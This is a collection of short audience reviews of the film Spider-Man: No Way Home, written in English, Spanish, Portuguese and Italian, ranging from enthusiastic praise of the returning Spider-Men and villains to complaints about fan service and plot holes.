i saw this in theaters with my friends so this is gonna be a great review, BUT! my actual review is after homecoming and far from home you would thing the next movie would be good, but this really beats both those movies with introductions of old characters and an amazing story.
85/100 - this movie was a pleasant surprise. some really funny and witty lines. seriously, there were some quips, and im not sure if they were riffed/improved or if it was scripted, but they actually made me burst out laughing. it had a lot of raw emotion, the fight scenes were great and choreographed well, and the writers werent afraid to do what needed to be done for a good story. it was a great idea to get all the old cast members, i cant tell you how much that benefits the plot. if they had substituted anyone it really would have detracted from the story.
It's a must to watch, highly recommend like tom holland, Andrew Garfield, tobey Maguire the three Spiderman's came together.
Spider-man: no way home not only delivers on the expectations of Spider-Man fans but exceeds them, weaving together a tapestry of characters and storylines that are sure to ignite feelings of nostalgia. It's also very well-directed, moving, and contains enough action and originality to be top-notch. Finally, those who thought that the Marvel character of Spider-Man was a bit superficial (I was one of them) might change their mind after this movie, which is the first one to go further in Spider-Man emotional and personal character.
A messy start but made up for with an incredible third act.
This was a great crossover movie for the Spider-Man films. I have not seen audience reactions like this since Avengers: Endgame. This movie brought together something only moviemakers can dream about creating. It is a wonderful addition to the Spider-Man collection by Sony and to the Marvel Cinematic Universe.
Amazing movie with a well done story. Visual and CGI are truly top notch , especially when it comes to the madness of the multiverse and Doctor Strange&#39;s magical and complicated powers. Everyone on the cast is giving it their all and that alone helps the film succeed . There are sad and heartbreaking scenes that will definitely make you emotional to the level that you might tear up. The powerful plot lines, unexpected cameos and spiderman villains will make this movie worth it for even casual viewers. It's funny, adventurous and even sometimes suspenseful. Overall a movie that I hold dear to my heart.
Zendaya is creepy but good other than that
Great plot and what an amazing idea to bring all three spidermen into one film. The similar but also different spidermen learning that they aren't the only ones is just amazing to watch. A very serious film with hints of comedy makes it amazing.
Masterclass! Not a clue how 31 critics said this was rotten. They clearly don't know anything about true blockbuster cinema.
This movie is so much fun if you've seen 7 other ok movies and were still somehow invested
SPIDER-MAN that’s all I gotta say even the final battle scene if you know you know
The dumbest movie I've ever seen. Marvel must stop polluting cinema
sale zendaya, alch esta culera
This movie was great I love how the 3 spider man gathered up
Not all of the acts were homeruns, but the fan service was done so tastefully.  It felt like every scene rewarded the viewer from having watched a previous Spider-man live-action movie.
Lengthy, sentimentally chatty, self-absorbed and overwrought, NWH is a very mediocre Teenage B- movie hiding behind a big budget. It's best when it pokes fun at itself, but a few good set pieces won't cut it. Prediction: will not age well (it feels dated in 2024, actually). Compare this to Birdman and you can see that Scorsese is right about (most) Marvel movies.
No way home is a Spider-Man fan's dream! This film brings the multiverse to Spider-Man's doorstep to bring back villains from former films. The returning characters are all great to see and it all makes sense for the story. The action scenes are some of the best in the Spider-Man films we have, especially a final battle taking place at the Statue of Liberty being a scene I will not soon forget. And this movie has such great fan service, that will make you smile ear to ear throughout! But the fan service never overshadows the important story beats. At the heart of this film is Tom Holland, whose performance is one of my favorite in superhero films. Even with all the multiverse stuff going on, this keeps the focus on Holland. This is a much watch.
FILME MARAVILHOSO! Recomendo demais assistir esse filme e todos os filmes do que adaptam o personagem Homem-Aranha.
O filme é muito interessante e traz uma nostalgia incrível.
A second watch showed that many inconsistencies in the story drag the film down. However, it definitely delivers all of the feels. And parallels drawn between the Peters are compelling.
¡Sublime película a Spider-Man! Fan service a su máxima expresión y nostalgia pura para los fans de Spider-Man.
Everything was great yadayadayada. Until the end came. When Peter Parker decided to make the sacrifice to make everyone forget him, the mcu was torn apart. First of all, taking away the bond between mj and with ned was already bad enough. Then, dr strange forgetting him, which also plays along with none of the avengers ever knowing he existed. All of a sudden Spider-Man was ripped away from the avengers, they will never remember the battle he fought with thanos or everything he's done for them. Next, his tech. His spiderman suit and anything that his biggest role model, Tony Stark, has ever left him, forgot him. If his spider man suit forgot him, his edith glasses definitely did too. Nobody will ever remember the bond Tony stark had with Peter Parker. Nobody will remember how important and amazing he is. All photos, videos and any memory of him was wiped away completely leaving him with absolutely nobody. Next, his schooling. With nobody at his school remembering him, or the lengths he took to get his friends into MIT by talking to the girl herself, his chances of getting into a college or university are impossible, having no background at all. Anyone and anything he's ever loved has forgot him, with not having a single person to remember him. At least aunt may was lost, because it would be heartbreaking to see the interaction between the 2 once she forgot him.  He doesn't have a house, because he was living with happy, and happy forgot him. When he is in trouble, nobody will be there to help him because nobody remembers who he is behind the mask. When Marvel made this decision, I don't think it was truly thought into how they will recover his story from this.
I still refuse to believe this movie is real. This movie was executed perfectly and i was so happy to see the cast of all the previous Spider-Man iterations return in their respected character's
Brilliant. The weight of consequence is high in this entry. Only problem is the movie teases the return of 2 beloved actors but they don't get enough screen time that it feels a little like a tease. Nitpicking but some of the humor is still a little lackluster. Otherwise a classic superhero film and great cinema.
Pretty much the best Spidey movie ever made. All the plot pieces & the storyline worked really well despite numerous parts & it was a thrill to see the previous A-list villains. And of course the masterstroke was to bring in the two previous Spider-mans; brilliantly respecting 20 years of movies & tying in the contemporary Spider-verse storyline.
Best Fan Service, and it doesn't feel forced, it's well planned
Has to be the most over rated movie in recent years
Jesus Christ! What a fantastic movie!
Other than the three spiderman scenes, this was underwhelming.
Great movie. Entertaining, witty, and fast paced.
I liked it so much, you should watch it if you liked the previous spider-man's movies.
People complain that it's relies too much on fan service but when did giving fans exactly what they want become a bad thing?  The main MCU cast carry this movie well enough through the first third that I wasn't merely waiting for the cast from the previous 2 franchises to show up but when they do show up, man, do they deliver.  DaFoe is fantastic in his role to the Green Goblin character and Jamie Fox redeems himself as Electro from what was…..yeah, probably the worst Spider-Man movie out of the 8 (3 Maguire, 2 Garfield, 3 Holland).  Speaking of which, Maguire and Garfield are clearly loving being able to return to their roles and they leave this Spider-Man fan smiling ear-to-ear.  The conclusion of this movie clearly sets Spider-Man up to fully move out of Iron Man's shadow and into more of the classic character that we love.  It's a movie I'll be returning to again and again.
This movie is the best thing Marvel did to the Spider-Man franchise ever since they debuting him in the Captain America: Civil War, bringing back all the legends from the previous movies, making this one something special. Once in a lifetime opportunity.
No spoilers here.
Por donde puedo empezar? Esta película tiene todo lo que pedíamos y mas, tenemos la continuación directa de la anterior película (Spider-Man Lejos de Casa) y es INCREIBLE!
Vemos y sentimos la desesperación y el miedo de Peter al ver que todo el mundo sabe que el es Spider-Man, vemos como hace lo posible para tener una vida normal y no puede, sentimos el mismo enojo que el siente por que no puede vivir tranquilo una vida normal.
Tenemos el regreso de grandisimas estrellas de anteriores sagas, Jammie Fox, Christian Haden Church, Rhys Ifans, y los grandiosos ALFRED MOLINA Y WILLEM DAFOE!
Dios, es que estos villanos tienen su continuación y sanación, todos vuelven de manera perfecta, y de igual manera cierran sus historias, un regreso hermoso y que pega justo en la nostalgia.
Pero, eso no es lo mejor, TENEMOS EL MALDITO REGRESO DE TOBEY MAGUIRE Y ANDREW GARFIELD CARAJO!
No se dan una idea lo que grite, aplaudi y llore aquella noche del 15 de Diciembre del 2021 en la Avant Premiere de la pelicula, jamás una película me emociono tanto como esta, Tobey y Andrew volvieron de una manera epica y hermosa!
Teniendo sus epicas redenciones!
Jamás sentí tanta felicidad viendo una película, los 3 actores que interpretan a mi superheroe favorito estaban compartiendo pantalla y de una manera epica!
Comparten momentos de Peter Parker y de Spider-Man, fue una maldita locura, una hermosa locura!
Pero esta película también tiene su lado triste, pudimos haber tenido muchas sonrisas y lágrimas de felicidad, pero te deja un duro final, con un nudo en la garganta, un dolor en el pecho y unas lágrimas cayendo de nuestros ojos, Peter debe ser olvidado de los recuerdos de quien ama para protegerlos, el guión nos dice: "Peter Parker ya no existe, pero Spider-Man sigue vivo" 🥹
Tiene una maduración impresionante el Peter de Tom.
Gracias @marvelstudios por traer semejante obra maestra, de la mano de Jon watts como director, y la hermosa y emotiva banda sonora de Michael Giacchino, trayendo de regreso grandes estrellas y haciéndonos volver a ser ese niño que veía películas de Spider-Man por las tardes.
Just awful.  worst spider-man movie I've ever seen.
una cagada de pelicula
Even though it doesn't utilize the character of Dr. Strange, no way home captures all the magic of previous spider-man films. It is truly an epic which will be remembered in the years to come.
Movies like this are the reason why people go to see movies in the theatre.  Good geeky non stop fun. I love the multiverse and this film pulls no punches in exposing as much as they can about the multiverse and different realities . It's so fun to watch all the 3 spidermen in one story joining forces against all their combined foes.
10/10
Spider-Man: No Way Home is fan service at best. I loved every second of this film and appreciated it even more being a big fan of Spider-Man (I watched all Tobey Maguire, Andrew Garfield, Tom Holland, and Spider-Verse)! The interactions between the villains and the other Spider-Mans were just so wholesome and entertaining! The action scenes were breathtaking, special effects were out-of-this-world, and it was surprisingly very emotional (I may have shed a tear or two).
Best marvel movie of phase 4! A great feeling for people who grew up on older spider man flicks.
I absolutely cannot believe that this junk got the ratings it di!!!!!!!!!!!!!
I had not watched the other Spiderman movies when I watched this movie. So, I was confused. But when I watched all the other Spiderman movies. I rewatched this one, and I wondered how good it was. I loved the movie!
All the dripping cliches of a high school coming of age movie from the the predecessor is gone and replaced with a story that feel authentic. Mysterio is a really great villain is that it is a commentary on media disinformation, rather than just big strong guy vs. big strong guy. Zendaya goes from side character to star. Overall, a great movie and one of my favorites from the Marvel universe so far.
spiderman is one of my favorites super heroes of marvel i remember see the movie and is so good i see it the movie in the cinema
Good but having Venom (credits aside) in it would have made me appreciate it more!
An absolutely amazing film. One of the Best marvel films to date!
Last good Marvel movie I ever watched in the theater. They have fallen off since then which is unfortunate. Great action and overall a truly goated movie about Spider-man as a person and I cannot wait for more of Spider-man. He more interesting then the other characters right now which is sad Marvel get checked up on pls.
It's was okay they could of made it better but loved the Tobey and doc ock and it made me happy it reminded me of spider man2
The story messed up big time, but it's also really hilarious, and it kind of needed to be.
first time watching this movie it gave me a sad feeling at the end tom hollend really makes you feel the pain that spiderman is going through.
Good plot, the best part was The 3 Spider-Man, all references, villains, screenplay, etc. Not my favorite, but it is great, especially when you have the time and effort for hearing the fans
There is the ending we all have been waiting for
I hated this movie after spiderman defeated Strange. He should have won.
Enjoyable film due to action and cameos, but a terrible storyline and not at all believable. Multiverse storylines are terrible in general and suffer from lazy writing. Could have been much better. Why would Spider-Man take all of the villains from previous films to his apartment? So, they trusted him, wanted him to help them, helped him to help them, and then suddenly turned on him? Not believable. Unfortunately, as interesting as the multiverse could theoretically be, superhero multiverse storylines are apparently primarily used to offer cameos that only appear to serve as nostalgic fan service or showcase B-list characters. Worth watching once, but that's about it.
i like this movie. The villains are all cool. It was like my uncle, 3rd grade bully, and my exes all appeared in the same room as me to beat me up. You just gotta prevail and make sacrifices. Inspiring movie
One of the greatest Spider-Man films of all time. There's nothing negative to say about this film for me, I enjoyed every single scene from this movie.
bom bom bombom. e muito bom
Although it's fun seeing old characters from other Spiderman movies return, some aspects of the story don't make sense. The movie feels chaotic and rushed for most of the time. Action packed, but a lack of heart.
A beautiful and impactful tribute to the legacy of Spider-man. Arguably, a magnum opus in the live action Sony Spider-man films.
THE BEST MOVIE OF HISTORY!!!! 🤩🤩🤩😎🗿🌌🥰🕷🕸🕺🏾
While still not the best Spider-Man movie, it has skyrocketed to my favorite Spider-Man movie and the best of Holland's trilogy. A couple iffy plot points but by the end it culminates in an incredibly satisfying way that both leaves you fulfilled and wanting more.
🇮🇹 Questo è stato a mani basse il film più atteso del 2021, dove mesi e mesi sono stati ricoperti di rumor e leaks. Un hype mai visto neanche paragonabile ad Endgame e alla fine dietro a tutto c'era un valido motivo. Spiderman No Way Home celebra quelli che sono stati 20 anni dello Spiderman cinematografico appunto interpretato prima da Tobey Maguire, poi Andrew Garfield ed infine Tom Holland. Che dire, tutti i difetti sono stati colmati AMPIAMENTE dal fattore emotivo che questo film mi ha causato, non mi era mai capitato di andare in un cinema dove sembrava di essere allo stadio e dove tutti si divertivano genuinamente. Di questo film bisogna osservare anche i grandi difetti che si trascina dietro, come, a mio parere, il movente della trama che se possiamo dirlo è un po' ridicolo, il tutto tra l'altro avviene in maniera leggermente frettolosa e in un modo poco intelligente. Ovviamente da qui si succedono una serie di quest dove Peter si trova costretto a raccogliere e cercare di rispedire a casa tutti i più celebri villain dell'arrampicamuri di quartiere riuscendoci poi alla fine di tutto, il che assomigliava ad un videogioco single player. Film che si basa tutto sul fan service, ma possiamo dirlo, vedere i 3 Spiderman combattere uno di fianco all'altro fa venire letteralmente la pelle d'oca. In definitiva ottimo film con però una regia un po' raffazzonata ed una trama poco orchestrata che però viene compensata dalla forte emozione che provoca a tutti gli appassionati. ———————————————————————————
🇬🇧 This was the most anticipated film of 2021, where months and months were covered with noise and leaks. A hype never seen not even comparable to Endgame and in the end behind everything there was a valid reason. Spiderman No Way Home celebrates what was 20 years of the cinematic Spiderman precisely played first by Tobey Maguire, then Andrew Garfield and finally Tom Holland. What can I say, all the flaws were EXTENSIVEly filled with the emotional factor that this film caused me, I had never happened to go to a cinema where it seemed to be at the stadium and where everyone had genuinely fun. Of this film we must also observe the great flaws that drags behind it, such as, in my opinion, the motive of the plot that if we can say it is a bit ridiculous, the whole thing happens in a slightly hasty way and in an unintelligent way. Obviously from here there is a series of quests where Peter is forced to collect and try to send back home all the most famous villains of the neighborhood rampers and then succeeds at the end of everything, which resembled a single player video game. Movie that is all based on fan service, but we can say it, seeing the 3 Spidermans fighting next to each other literally gives you goosebumps. Ultimately an excellent film with a somewhat crazy direction and a poorly orchestrated plot that is compensated by the strong emotion it provokes to all fans.
mister holland has a crisis and the crossover episode of the decade
Spider-Man: No Way Home is an MCU masterpiece that will fill your heart with glee, exciting action sequences, terrific callbacks, amazing villains, of course Tobey and Andrew were great too, overall this will definitely be an emotional roller coaster for you. 

10/10
It's not often that a movie is perfect, but this one is. This was the perfect way to round out the previous stories, I am still shocked they got all the original actors back and I'm still shocked that we got to see Spider Man V.S Dr Strange. This movie is a must watch for any Marvel fan.
Personally I loved the film and how they bring back the old spidermen
This movie is so perfect because they finally bring back the goats and every scene is funny, insane, emotional, and FREAKIN SPECTACULAR!! And Tobey Maquire Spider-Man is still THE GOAT!! THE GOOOAT!!!
Absolutely brilliant film. It was so full of nostalgia and entertainment. Love how all the other villains and spideys were in it! All in perfect character to their movies as well. One of my favourite spiderman movies of all time. It was so nice seeing Tobey and Andrew back in it. They both absolutely smashed it, and stayed true to their character. 

Can't wait for the next one. I'd love to see Tobey and Andy in another one, along with Tom. Please make it happen
"No Way Home" is the christening that Tom Holland needed to go from Spider-boy-sidekick-to-the-Avengers to an actual legitimate Spider-man.

The film treads dangerously close to what feels like cheap fan-service/fiction, but with carefully crafted writing that's deeply respectful utilizing genuine harrowing emotion it pulls through with delight.

The pathos of the Spider-man character resonates across multiple themes and iterations. You walk out of this film taking it all in and it really is the type of insanely chaotic yet perfectly balanced experience you can only expect to be made by Marvel.

An iconic Spidey film for the ages.
The event of the century 
aka can i sue for emotional distress
One of the greatest movie of all time.
This is a movie that makes me so happy. Every time I watch it, it just brings back so much nostalgia
One of the best MCU movies. It brings back many old characters making it an exciting jam packed film
very excellent movie would recommend, i just don't like how everyone switched up and started liking andrew💀
As good as it gets Post Endgame.
Every character is given respect.
People may call this movie fan service, but I have no problem with that. I loved the old characters returning. This was exactly what I was hoping to see and more. I can't wait to see where they take Tom Holland as Spider-Man from here.
I am not getting it. Tom Holland not looking a day older than 25 returns to high school? When was Peter Parker found out as Spiderman in the comics ? Even Superman without the help of a mask has a civil life where he is unidentified as a super hero. Where in the comics does Spiderman connect with all other superheroes, and of all super heroes Dr Strange, the mystical excuse of a super hero? It's another move you do when the franchise is dead. Solving Peter Parker's problems instead of tying him up in other people's problems creates a circularity that dilutes the story. After that all vilains come to him like it's a parade. Then the scene moves elsewhere. Nothing makes sense. He washes his suit with soap and water, a suit that is made of nano particles.  Of course when nothing makes sense, a guy with a cape appears and explains it's magic. But are we little kids ? A lot of money has been thrown at this thing and it is kind of a mess. I stopped watching at minute 42. This thing is slow and long. Dyslexic and boring.
Finally a good Spider-Man MCU movie. The writer had a good job of making Peter has consequences and it was very hyped and very fun too watch
Best Movie EVER!!! BEST SPIDERMAN EVER!!! MUST WATCH!!!!!!!!!!!!!!!!!!!!!!!!!!
I seen this movie last year after it came out i love it so much.

:)
Best Spiderman movie so far!
Best Spiderman movie. This is an example of a movie where the fans wanted something and they got it. But not only that, but even the critics enjoyed it.
The greatest combination of new, nostalgia , continuity, and just awesome webbed into a single film.
Spider-Man No Way Home felt like nostalgia wrapped up in a box and was given to the fans as a gift, but we got bad acting, an slow-paced first and second act and bad callbacks to the original films.
This perfectly brings all of the Spiderman movies together and gives each of the characters an satisfying ending.
best spiderman movie
The perfect Spider-Man movie. Exceeded all expectations. I cried multiple times watching this and am nearly brought to tears reliving it in this review. The supreme example of how to capitalize on nostalgia and reward loyal fans with a satisfying payoff. One of my favorite movies of all time. Hits you right in the feels. 10/10.
I went to the cinema five times for this movie and bought it as soon as I could. I think that's all I need to say about it.
One of the greatest marvel movies I ever seen
Decent movie, but I feel a more grounded spiderman movie that didn't involve a multiverse and capitalising on previous adaptations would have been nicer. 
I get my Marvel went this route, I just felt it made the movie worse.
With great power, comes great responsibility.
One of the best movies of all time.
The best Spider-Man movie ever, all 3 Spider-Mans in one movie.
Could have been better, I felt Marvel relied on a lot of nostalgia for this movie and though that was good it wasn't enough to make it great.
Spider-Man: No Way Home is a well-crafted, expertly paced emotional journey that rivals the best of the MCU.

To avoid spoilers, I'm just going to take this time to emphasize how masterfully calibrated this movie is. With SO much to cover in such a short time, this film could have EASILY been too complicated and congested to succeed. Instead, it exceeded expectations by (somehow) allocating the EXACT right amount of screen time to every single character and plot point.

There was no shortage of cheers or tears in the theater thanks to No Way Home's balanced mix of excitement, surprise, nostalgia, and grief. I left the theater feeling 100% satisfied and can honestly say there is nothing I would change about this film.
Best Spider-Man movie yet! Great acting, great plot, great CGI, good humor, and great action scenes. 5/5 stars. You will love this film.
I had a lot of fun, but if the film didn't have the cameos it does, it would be regarded as the worst Spider-Man film. The logic in it falls apart under the slightest scrutiny. If the cameos were of random people and not ones we grew up loving, people wouldn't be so lenient with it.
very fun, definitely carried by fan service though
This Spider-Man movie is really good, 89-92%
I think that this movie had a great cast with amazing villains and heros
As a doctor strange fan and spider-Man fan love this movie!! 10/10!!
A really good multiverse movie. It sucks that it had to be achieved at the expense of the guy that went head to head with Thanos with not only one or two but Three! Infinity stones! So... Yea. Overall a good movie.i just wished they hadn't made one of the strongest characters in the MCU a dumb guy. So many good payoffs!
This movie is so good movie has fun web swinging there are villains from other spider-man universes and there are the 3 spider-men there are villains Doctor Octopus, Green Goblin, Sandman, Electro, Lizard so go watch Spider-Man No Way Home only in theaters on December 17
A good film, but way too much fan service. Graphics are great, and Holland delivers one of his best performances yet, but this is sorely overwritten by its reliance on the original Spiderman films. Disappointing sequel to a great movie.
Best movie of 2021🔥🔥🔥🔥🔥🔥🔥🔥🔥
This movie looked really good, the script was well written and the comebacks from the older spidermen was really cool. But it just did not feel the same as the other spiderman movies
Pretty damn satisfying. A whole lot of fanservice but I'm not exactly angry about that. Spiderman's entire arc up to this point is revealed to be his origin story. I remember people commenting on the absence of one, and that it detracts from the humbleness that made this such a beloved character. Well, now Marvel has set up a unique one that is actually somewhat refreshing.
A fresh continuation of the new Spiderman Series. With a great plot and twist. A must watch for fans and casual viewers.
Best spider man movie
Seeing Tobey, Andrew, and the villains back on screen was amazing. The hype for the movie was insane
SPIDER PEAK!!!!! I CAN TAKE ALL 3!!!!!
A brilliant third instalment in an otherwise horrendous Marvel phase.
Los personajes antiguos como el Duende, tobey, electro y sobre todo Dr.Octopus y Andrew son buenisimas el final es bueno y aunque cambiaria muchas cosas esta bastante bien.
Only the best of the best of the previous 2 Spider-Mans and the current Spider-Man made its way to this wonderfully executed, sky-high-stakes installation. You really cannot help but absolutely love this film.
The best Hero movie of the actual generation!
O filme é perfeito, redondo do começo ao fim, perfeito!
One of the best MCU movies.
As a long term Spiderman fan this film got a weak storyline and plot holes
That's what I'm talking about.That why he's MVP.That's why he's the goat.The GOAT
People weren't astounded by the story; rather, they were astounded by the nostalgic aspects.
In essence, it serves as a love letter to Spider-Man fans and a chance for the MCU to right its wrongs.
Boring to watch. Wouldn't recommend it.
No way home is just bad! It relies too much on nostalgia and the story will leave you rolling your eyes!
PG-13, that's the target audience, teens and young adults 🙁
Amazing homage to a childhood long ago - a must see for any age!
It's just EXTRAORDINARY FOR MOST SPIDER-MAN/MARVEL FANS, MUST WATCH!!!!!!
Overrated. I watched it again at home and got bored. Im a huge spiderman fan but this movie wasnt better than other spiderman movies. Not to say its bad, but its far from the greatest spiderman movie.
The death knell of originality. Dumb plot, dumb characters from the Amazing Spider-Man movies  recycled for the sake of childhood nostalgia and nothing new. When the history of the decline of superhero movies is written this movie will be cited as an essential stepping stone. 

Writers and executives said: "Well if they'll accept Ned as an inadvertent master of the mystic arts they'll accept any poorly written nonsense from here on out." Pure garbage, through and through as a stand alone movie, it's success is derived from milking the nostalgia cow, nothing more.
Good spider man movie
Literally fan fair the movie! 3rd best Spider-Man movie ever
Weak plot, cool scenes
Not to ruin everyone's fun but the third act really ruined it for me. First two-fourths? Amazing. Andrew Garfield appearing? Cool. But they just did not feel like Spidermen here. I appreciate them appearing but they were just, there.
The ultimate Spiderman movie. With the inclusion of all the returning villains from past Spiderman films, the emotional turmoil Peter goes through still mourning the loss of Tony Stark, and his determination to help those who seek to destroy him, this movie is perfect for so many reasons. The relationship between Tom Holland, Jacob Batalon, and Zendaya is phenomenal and makes me reminisce about friendships I have had. I laughed, I cried, I sympathized, I was overjoyed, I was brought to the edge of my seat, I was angry, and all within the first half. Definitely one to add to the top movies I have ever seen, Jon Watts has made the perfect movie
The best film of every trilogy or films that came before it. It brings everything that the movies before it together, the return of all the villains + the other spider-men is just the best. It has everything, the action, the feels, and the story!
*spoilers*A fan service movie that doesn't feel forced as it fits the plot of spider man trying to keep the ones he loves safe and happy. Andrew is given the treatment he deserves and gets his gwen redemption. Tobey is the og and is given additional heart. The end is my favourite….. spider cant win….. he does whats best for the ones he loves
I'm not a Tom Holland's Spider-Man fan. I don't like all the CGI or 30 different costumes.  I don't think he has any emotion except excited kid. Which I guess is how I would be if I was able to play Spider-Man in a movie.

The first 30 minutes or so were pretty boring. The whole movie felt rushed but slow at the same time. Like there was all this filler and then they had to zoom to quickly set up a plot. 

This movie was ok. The Green Goblins return was great. Andrew and Toby were a blessing. The rest was pretty much a pile of spaghetti. 

Ending was just too convenient. They just created all these cures and fixed it all. They could've played so much more with the broken nature of each Spider-Man. 

It was ok but I didn't need it in my life.
Excelente pelicula superó mis expectativas.
Otra película increíble de el hombre araña, muy buena igual que las otras
This is fan service done right all the hype, and all the expectations came true and delivered on his story that made sense and that made Tom Holland Spider-Man the true star in this movie the villains, the side characters even Andrew Garfield and Tobey Maguire were very very good and the thing that made this special was that Tom Holland was the star in each problem didn’t feel like a cohesive mess like Spider-Man 3 try to do where is another problem and after that problem there is another problem that after that problem is another problem in this movie problem are resolved and then another problem is occurred after that problem resolved then another problem has come and then another problem has come, and that problem is the only problem with focus on and is such well pasted that we care about each scene in each character. They’re in the back of our minds know what’s to come there’s only a few key minor problems that I really did not like, the only problem that I did not like was the first act where Peter has to go to Doctor Strange to fix all the problems that was caused by Mysterio and letting Mysterio know peters identity. It would’ve been very intriguing that Peter was the one that casually made a mistake and made the heroes and villains from other Spider-Man universes come to the MCU that he was the one pulling the strings and being active but other than that this was a really find movie they made all the hype and expectations succeed 9/10
It's crossover epic and spider man and Tom Holland it's best actor movie
Meh, typical super hero movie and all
A marvel fans dream.
Basura para bab🐻🐻vendeida con fancervice
es una pero muy muy muy buena pelicula spiderman no way home trajo devuelta a villanos de las sagas anteriores en especial a tobey y andrew que en mi opinion es lo mejor de la pelicula
No Way Home is a stroke of genius. It is intelligent fan service done so well that it feels completely authentic. The charm of each character is on full display, and the emotional stakes are at an all time high without being obnoxious (like some other Spiderman films). This film has everything you could want.
Easily the most overhyped movie in MCU history. While the audience is of course going to be thrilled to see all three spidermen together in chorus, we should think more critically about the plot devices used to put them there. Dr.Strange, previously a brilliant universe saving sorcerer supreme, doesn't consider the ramifications of a universe endangering spell. Ned can just use magic…because that's how bad writing works. Furthermore, throwing away Peter's Aunt after having not built her character up in the previous films with a line that felt more obligatory than deserved was just another jammed in cameo in this already undeserved victory lap.

How can this movie seriously have all three Spidermen in it and give two of them less than an hour of screen time? What a waste of talent. 

Yet, it's still being praised as an award worthy feat. The writing and decisions made in this film were atrocious and I'm begging fans to get less fanatical and think more critically about what they consume so that, in the future, we can raise our standards instead of giving Disney/MCU the impression that these cash grabs will just keep working. As things stand now, it seems they will.
OH MY, what a good movie! The story was awesome, and to see that the MCU Spider-Man trilogy was Tom Holland's Spider-Man origin story was awesome! I am super excited for the confirmed Spider-Man 4 with Tom Holland, the first film with him as a more traditional Spider-Man character. I loved that there was a reintroduction and redemption for past Spider-Men we have seen on the big screen, specifically Andrew Garfield when MJ falls and he catches her. This movie also does a good job of fixing the "best Spider-Man" debate, it shows that each one is a distinct Peter Parker in a distinct universe, it shows that their lives live on even when they aren't on the big screen. This movie also makes me want to see an Amazing Spider-Man 3 and a Tobey Maguire Spider-Man 4. This movie is hands down one of the best Marvel movies to date, along with Guardians Vol 3!
The best live-action Spider-Man movie by far; No Way Home is the culmination of every Spider-Man's journey in every iteration. The plot is a little shaky, but the performances, character growth, and above all, the fan service, make this movie truly magical.
AMEI DEMAIS!!! PARABÉNS TOBY MAGUIRE É ANDREW GARFIELD VOCÊS SÃO INCRÍVEIS!
Nostalgic enough to make you want to rate it a 5. Although the overall flow of the movie was pretty disappointing. The Spider-man humor was there and great as usual.
La película desde un inicio fue una muy buena película (los 5 villanos, spiderman, doctor strange, la pelea en el puente, la pelea con el duende verde, la "muerte de la tía mey" y la escena de la lluvia después de la muerte de la tía mey ES PERFECTA) nada podría mejorarlo hasta que... Llegaron los tres spiderman (fue lo mejor que e visto) de mis películas favoritas.
Top 5 mejores películas q e visto
Best movie I've ever seen in my life. it's a miracle
4/5 
No Way Home is over rated
it's kinda boring for most of it and i rewatch it for the last  hour
It was cool to see the 3 Spider-Men team up against all of their rivals.  The visual effects and action scenes are pretty good.
Watched this in theaters when it first came out and was blown away by it. The story is great, the emotions and tensions are high, and also has some of my favorite cameos. I have heard somewhere that watching at home is not as fun so maybe I have to rewatch it again but from what I remember 9/10.
good movie but it's all big fan service
Absolutely a perfect Spider-Man movie! Perfect conclusion to this mcu Spider-Man trilogy! The third act was the highlight of the movie just when Tobey and Andrew step in, all 3 Spider-Man together was just perfect! Perfect second half and really lovely to see all the villains from previous Spider-Man films. Dafoe killed his role as the green goblin! Tom hollands Peter Parker really became the spider man we all adore from the comics and became responsible like he should have been. This movie is a chefs kiss!
Great Attraction Of Nostalgia
Really awesome my favorite parts were Andrew, and the end with the new story beginning
Absolutely amazing movie packed with intense moments, action and emotion from start to finish. It's also awesome to have all three spider men in one movie, if you're a spider man fan this movie is a must watch.
No Way Home combines everything that made the MCU so great: Action, humor and lots of emotion. The joint appearance of Tom, Tobey and Andrew alone would have been worth the cinema visit, but the rest is also convincing across the board. Simply epic with so many moments that keep you spellbound in the cinema chair and leave you thrilled when the credits roll.
Exactly what I needed!
O melhor de todos!! Recomendo demais!!
Best Spider-Man movie ever. Nostalgia is everywhere in this movie. Seeing all the villains from all the old Spider-Man movies was a great feeling. Willem Dafoe was FANTASTIC as the Green Goblin. Menacing, Terrifying, and most importantly he feels like an actual threat to Spider-Man. The ending is emotional and I can't wait to see the future for Tom Holland's Spider-Man.
Fun time and cinema experience was amazing but when rewatching at home you realise many contrived moments. still a fun watch for every spider man fan tho
Top 3 Spider-Man movies ever!
Saw this in theaters. It was a great movie and I rewatched it again. I feel like it's tied with Batman (2022). Bringing back Tobey and Andrew made the movie 100x better. Without them in the movie this would've been 4 stars. Great villains and sad movie with the deaths and memory wipes. Shows the dark sides of Peter Parker.
O filme em si é bom , a continuação soube aproveitar bem o personagem
Brings the best of all Spider-Man media, breathtaking action and great storytelling.
Incrível como já vi este filme 5x e acho uma obra verdadeiramente espectacular, desde a individualidade de contracenar de cada um dos actores é unica, como a velocidade que corre a história que torna um filme altamente cativante.
Genial*****
worst one in the trilogy, tom lost every thing he work for i the first two.
This is fan service done right.
The most awesome mcu movie ever! 
The experience of seeing this in theaters was unbelievable and a whole lot of fun!
Thanks to Peter Parker and Doctor Strange messing up a spell and seeing old Spider man villains again was a hoot and seeing earlier Spider mans again was like a dream come true!
MY BEST CINEMATIC EXPERIENCE EVER. If you didn't watch this movie opening weekend you did not fully enjoy this movie in my opinion. 

Is this the best movie ever? No. It has it's flaws but many movies do. I give it the full rating because Spider-Man is my favorite character in all of fiction and your personal enjoyment should factor in your ratings

Even with the grand entries to the multiverse with Andrew and Tobey, this is still Tom Hollands Movie. Yes Andrew steals the movie at times but the plot and events are all catered to the story of Tom Hollands Peter Parker. 

There is no other movie in existence that has wrapped up an origin story of a character and soft rebooted that character like this before. Is it a sneaky way for Sony to easily take Spider-Man out of Disney's MCU if deals don't pan out? Absolutely. Was it done beautifully? Absolutely. 

This movie cements Tom Holland as one of the best actors in the business, his wide range of emotions and physical talent is rivaled by few and thankfully this can now remove him from lesser movies like Chaos Walking. 

The music and CGI were fantastic. The ensemble cast carries their strong performance from precious films, the cinematography was bar none. All of the props and all of the kudos to director John Watts. 

A true blockbuster film that also celebrates over 2 decades of cinema while telling a story about love and perseverance. I enjoyed this movie so much that I have no nitpicks honestly. Adding throwback characters or changing anything would most likely not affect the out of body experience it was for me to watch this movie.
It was really good  👍
to me the movie was fine but the characters from other worlds were not like them like the way that they acted or talked it wasn't them, the Maguire's spiderman and Garfield's were something like shadow of their past self and they had very little character development and yes they had their own character in their own movies but in this movie they are like a joke for good example of good other world spidermans there is into the spider verse movies that are the thing that this movie could be but it wasn't, and there's the jokes that some of them are funny but a lot of them are like forced into the movie and  it just doesn't work and make the movie boring 
sorry if it is too long this is my first ever thing that i wrote
